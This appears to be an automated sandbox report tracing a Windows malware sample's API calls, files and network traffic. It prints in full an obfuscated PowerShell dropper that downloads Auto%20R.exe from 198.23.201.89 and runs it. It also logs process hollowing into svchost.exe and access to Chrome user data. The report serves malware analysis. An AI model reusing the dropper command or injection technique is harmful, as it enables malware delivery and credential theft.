protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Roaming\Auto%20R.exe
file C:\Users\test22\AppData\Local\directory\.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.vbs
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
cmdline powershell.exe -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\directory\.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1540
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received j"Yf9„‹—„Ûtf2ۄÛtœë`€ûtÏ3ÀMàf‰„uÔßÿÿ…ÔßÿÿPèA‹MôEàPè9Màè3ö2ÿ‰uø‹uW‹Îèí<j Y·f;Át j Yf;Á…<ÿÿÿGëÞ³‰uðé2ÿÿÿ…öt@„ÛuF3ÀMàf‰„uÔßÿÿ…ÔßÿÿPè—@‹MôEàPè΍Màè¦_^[‹å]ÂGéÈþÿÿ„ÿu¼„Ûté붋UðNÿéæ–U‹ì‹;Q}B‰‹A‹Mÿ4è¨B°]‹MhùHè>2ÀëëÌÌÌÌÌÌÌÌÌÌS‹ÙW3ÿ9{vTVd$‹s‹4¾…öt‹F ÿ‹F ƒ8t$VèуċCǸG;{rÐÇC^_[Ãÿ6èúÐÿv èòЃÄëȉ{ëäU‹ìV‹ñ‹F 9Fu/ jX;Ès_W3ɉF jZ÷âÁ÷Ù ÈQèBЃ~‹øYuB‰~_jè.ЋÐY…ÒtQ‹E‹‰ ‹H‰J‹H‰J‹@ ‰B ÿ‹N‹F‰ˆÿF^]‹Á띋F…Àt·ÁàPÿvWèmÐÿvèQЃÄë3ÒëÆV‹ñÇhùHèîþÿÿÿvè2ÐY^Ã=iLt(V¡ iL¹iL‹0è%…ötQ‹Îèƒ=iLuÚ^ÃU‹ìQSVWj‹ÙèwÏ‹øY…ÿt=Oè97‹uO‹Æ‰}üÁà„ÃPèþ@Eü‰7P‹Œèã_^[‹å]Â3ÿëÇV¾DjL‹…Éu/ƒÆþ`rL|ïh0jLh,jLè&h<jLh8jLè^é;ÿÿÿQèƒåƒ&ëÆU‹ìƒäøìÌ€=ˆbLV‹ñ„×hL$ è?:€=‡bL„™”3Àf‰D$D$PL$ èÓ;€=…bLL$…”ƒ~`…‘hÐbLè;h´„$ jPèŽî¡¬bLL$$‹T$ƒÄ 3öDŽ$¨F‰„$‰´$ h€Ç„$(èkYD$P„$4PèîYY„$PVÿ¼ôHL$èd^‹å]ÍF\Pè™?ékÿÿÿU‹ìV‹u W‹}ƒ?…”ƒ'_Æ^]ƒ  hLÿ3Àƒ ¤hLÿ¹¬hLVWh¼ùH£hLÇ”hLf£˜hLÆšhLÇœhL £¨hLèÂ<h ùH¹¼hLè³<¹ÌhLè/5¹ÜhLè%5¹ìhLè5¡¬hL¾4iL£ühL¡°hL£iL¡´hL£iL¡¸hL£iLj_ÿ¡¼hL£ iL¡ÀhL£iL¡ÄhL£iL¡ÈhL£iLÿ3À£iL£ iL£$iL¢0iL‹Îè¢4ƒÆOyóƒ drLÿ3À_f£$jL£(jL£,jL¢0jL£4jL£8jL¢<jL£@jL£`rL¸hL^ÃVWèVýÿÿj¾$jL_ƒî‹ÎèáOyó¡ iL…À…»’¹ iLèǹühLè½¹ìhLè³¹ÜhL詹ÌhL蟹¼hLè•_¹¬hL^é‰U‹ìƒäøì¼SVWh´3ÛÇD$¨D$‹ñSPèìƒÄ 9ž˜u ¡ÄbL‰†˜9ž¤u¡ÈbL‰†¤‰†¨9ž°u ¡ÌbL‰†°ž S¾œWè¸ýÿÿ¡¬bL3ɉD$ÇD$ÇD$ÇD$ ‰L$$9N@…Ø‘‹†˜‰D$$‰€=ˆbLD$PtQÿ¼ôHƈbL‹ÎèSüÿÿ_^[‹å]Ãjÿ¼ôHëèU‹ìì¸€=ˆbLtP3Àh´P¢ˆbL‰œ…LüÿÿPè$롬bLƒÄ ‰…Lüÿÿ…HüÿÿDžHüÿÿ¨DžPüÿÿPjÿ¼ôH‹å]ÃU‹ììÀÿM SVW‹ñ…‚h´…HüÿÿDžDüÿÿ¨jPè»êƒÄ ‹Îèžûÿÿ‹}3ÛC€=ˆbLt5€=‡bL‰½Hüÿÿ‰LüÿÿDžPüÿÿ…~ …ÿ8ž”t SWÿ ÷HjhîSWÿ÷H_^[‹å] Ɔ”éېU‹ìƒì<SVWj,EÈÇEÄ0jP‹ùè"ê‹EƒÄ ‹Ð 3ö‰Müj[jZ-…ǐj@^jõ‹ÏèCúÿÿ…w …o‘_^[‹å]ÂU‹ìV‹uW‹ù…ötFÿPRWè—üƒÄ 3Àf‰Dwþ_^]ÃV‹ñNèôVèöÉY‹Æ^ÂVW‹ù‹GP‹pèßÉÿ‰wY…öu!w_^ÃU‹ìVj‹ñèLÉ‹UY‹È‹ƒa‰ƒ~u ‰Nÿ‰N^]‹F‰HëîU‹ì‹E V‹u¯ÆW‹}øë+} ‹ÏÿUNyõ_^]ÂU‹ìƒìXSV‹ñ‰UøWMØè¸0M¨è°0MÈè¨0M¸è 0‹Mè‰Eè‹F‰Eì‹F‰Eð‹F hÀúH‰Eôÿèâ6ƒËÿMÈ;Ä ‘pSVEèPèB2SVMèè7h€ûHMÈè¯6‹ð;ótSVEÈPM¸è2SVMÈèî6‹]ì3öƒûv8VMèèo3j\_f98„T‘jMèè‹3fƒ8:uj_WVEèPMØèÍ1‹÷jÿVEèPM¨è¼1‹Eø…Àt MØQ‹Èè¦9‹M…Ét E¨Pè–9‹M …Éu6‹M…Éu:Mèè=M¸è5MÈè-M¨è%MØè_^[‹å]ÍEÈPèP9뿍E¸PèE9ë»U‹ì¸èÓVhÿ…ðÿþÿ‹ñPjÿ¨ñH…ðÿþÿPMðèª6‹ÖMðè 
Mðè»^‹å]ÃU‹ì¸èÕÒVj…ÿÿ‹òPhÿÿ1ÿ`óH‹Î…Àt…ÿÿPèF4hÀúH‹Îè”/^‹å]Ãèð5ëèU‹ìQ‹EVW‹=xbLƒøÿ…,‘jj^VVjjcWÿD÷H_^‹å]ÃU‹ìƒäø¡(tLƒì €xVW„²‹EL$3ÿ£xbL3ö‰=|bLF‰=pbL‰|$‰|$‰t$‰|$‰|$ ‰t$$èžPD$ÇD$‰D$ÿd÷Hh¼E£°bLèìYVèfìY‹ ,tLè¡ÿuèŠñÿÿ¡,tLjÿpWh ÿ@÷H‹5|bLL$è9PL$è0P‹Æ_^‹å]Â3À@ëó¡,tL…ÀtPè^ÆYÃVj èÞÅ‹ðY…ötèp‰5,tL¸,tL^Ã3öëïU‹ìƒì SVÿ4÷H‹]‹ð;Þ…13À@^[‹å]ÂU‹ìQSW3ۍEüSPSh ‹ù‰]üÿ@÷H‹EüjSSh ‰Gÿ@÷H_[‹å]ádbL¨uƒÈh¸·C£dbLèÑäY¸ tLÃV‹5(tL…ötN è›VèÅY^ÃVj<èÅ‹ðY…ötè®ÿÿÿQ‹Îè£(tL¸(tL^Ã3ÀëðU‹ììTSV‹ñW~ ‹Ïè±,…¬þÿÿÆF8PDž¬þÿÿÿŒñH‹…°þÿÿ‹Ï‰‹…´þÿÿ‰F‹…¸þÿÿ‰F…ÀþÿÿPèÓ13À9G‡ƒÈÿ‹Ïƒøÿ…þPjè3hìúH‹Ïè-‹3Éf‰N3‰N‰N ‰N$‰N
Data received (‰N,f‰N0ˆN2j[ƒè„ݐH…‹Fˆ^ˆ^…À„K;Ä^ƒø…ˆ^'ˆ^%ˆ^!ˆ^)8]Æ…aˆ^(Eü‰MüPÿ`òHPÿñH9]üuˆ^4ƒeȍ}Ìj3ÀYó«8F4ti!EðMð!Eøèg„ÀtKMðè[„À‹Eøt5MÈQÿЃ}ðt ÿuðÿ˜ñHf‹EÈf‰F6‹Æ_^[‹å]Â‹é Péýþÿÿ¸R·CëčEÈPÿ”ñH뾍EÈPÿ”ñHëÁV‹ñƒ~u hûHÿœñH‰…ÀthûHPÿ ñH‰F3À9F^•ÀÃU‹ìƒì ƒeôƒeüV‹ñMô賄ÀtMô规À‹Eütÿ6ÿЃ}ô^t ÿuôÿ˜ñH‹å]øR·CëáU‹ìƒì V‹ñ3ÀMô‰Eô‰Eü‰è3„ÀtMôè'„À‹EütVÿЃ}ôt ÿuôÿ˜ñH‹Æ^‹å]øR·CëàV‹ñƒ~u hûHÿœñH‰…ÀthpKPÿ ñH‰F3À9F^•ÀÃV‹ñƒ~u hûHÿœñH‰…Àth pKPÿ ñH‰F3À9F^•ÀÃÌÌÌÌÌÌÌÌÌU‹ìƒì(SVWh‹ÙèƒčMìPè3Ò¶‚8SJˆDض‚@SJˆDàBƒú|äjEèh¨=LPèaÂƒÄ ƒ{ …µÿ3‹Ëèò‹ð‰E›€{…á¹ÿ3Qjÿuì‹Ëè ‰Eøƒø|cxì3҅ÿ~0‹uìƒÆ3À덤$ŠLØ:Lþt2ƒø„=ŽBF;×|܋Eø‹u€{u$jƒÆì‹Ëjìÿ3ð‰uè‹넊LÙ:Lÿt-@ëÁ¾Mìè›_‹Æ^[‹å]€}‹Ët8èûé9ÿÿÿŠLÚ: tƒÀ뉊LÛ:Lu*ŠLÜ:L„¦ƒÀéiÿÿÿèL
Data sent GET /warm/Auto%20R.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2572
thread_handle: 0x0000013c
process_identifier: 2568
current_directory:
filepath: C:\Windows\System32\svchost.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Auto%20R.exe"
filepath_r: C:\Windows\System32\svchost.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000134
1 1 0
host 198.23.201.89
file C:\Users\test22\AppData\Local\directory\.exe
count 2072 name heapspray process powershell.exe total_mb 129 length 65536 protection PAGE_READWRITE
Time & API Arguments Status Return Repeated

send

buffer: GET /warm/Auto%20R.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive
socket: 1436
sent: 80
1 80 0
Process injection Process 2456 called NtSetContextThread to modify thread in remote process 2568
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 3013908
registers.edi: 0
registers.eax: 4199888
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000013c
process_identifier: 2568
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\Auto%20R.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\Auto%20R.exe"
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Users\test22\AppData\Roaming\Auto%20R.exe